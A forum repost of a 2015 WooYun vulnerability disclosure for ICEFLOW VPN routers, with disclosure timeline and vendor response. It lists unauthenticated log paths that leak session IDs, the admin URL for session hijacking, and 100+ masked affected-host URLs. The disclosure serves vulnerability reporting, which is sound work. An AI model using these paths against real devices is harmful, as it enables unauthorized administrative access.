中神通公司技术论坛 - Powered by Discuz! Board

标题: 上海冰峰网络某VPN路由设备存在通用型设计缺陷(可实时利用登录系统) [打印本页]

作者: linda 时间: 2016-1-8 10:30 标题: 上海冰峰网络某VPN路由设备存在通用型设计缺陷(可实时利用登录系统)

漏洞概要
缺陷编号：       WooYun-2015-134377
漏洞标题：       上海冰峰网络某VPN路由设备存在通用型设计缺陷(可实时利用登录系统)
相关厂商：       上海冰峰网络技术有限公司
漏洞作者：       YY-2012
提交时间：       2015-08-18 16:49
公开时间：       2015-11-17 11:10
漏洞类型：       设计缺陷/逻辑错误
危害等级：       高
自评Rank：       10
漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源：       http://www.wooyun.org
Tags标签：设计缺陷/边界绕过逻辑错误

漏洞详情披露状态：
2015-08-18：       细节已通知厂商并且等待厂商处理中
2015-08-19：       厂商已经确认，细节仅向厂商公开
2015-08-22：       细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-10-13：       细节向核心白帽子及相关领域专家公开
2015-10-23：       细节向普通白帽子公开
2015-11-02：       细节向实习白帽子公开
2015-11-17：       细节向公众公开

简要描述：附100+案例。
详细说明：由于“ICEFLOW VPN Router”设备产品存在各种日志文件未授权访问可导致系统敏感信息泄漏。（包括登录成功后的session值）

code 区域系统日志http://url/log/system.log
VPN日志http://url/log/vpn.log
移动用户日志http://url/log/mobile.log
防火墙日志http://url/log/firewall.log
访问日志http://url/log/access.log
告警日志http://url/log/warn.log
错误日志http://url/log/error.log
调试日志http://url/log1/debug.log

根据日志信息获得session后，可利用实时登录系统管理后台：

code 区域http://地址/cgi-bin/index?oid=10&session_id=通过“system.log”文件获取&l=0

漏洞证明：

案例：

code 区域**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8888/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8081/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8888/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8888/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8000/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0

修复方案：限制访问各种日志等。

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应
厂商回应：
危害等级：高
漏洞Rank：15
确认时间：2015-08-19 11:08
厂商回复：CNVD确认并复现所述情况，已由CNVD通过软件生产厂商（或网站管理方）公开联系渠道向其邮件（和电话）通报，由其后续提供解决方案并协调相关用户单位处置。
最新状态：暂无
原文：http://www.wooyun.org/bugs/wooyun-2015-0134377

欢迎光临中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)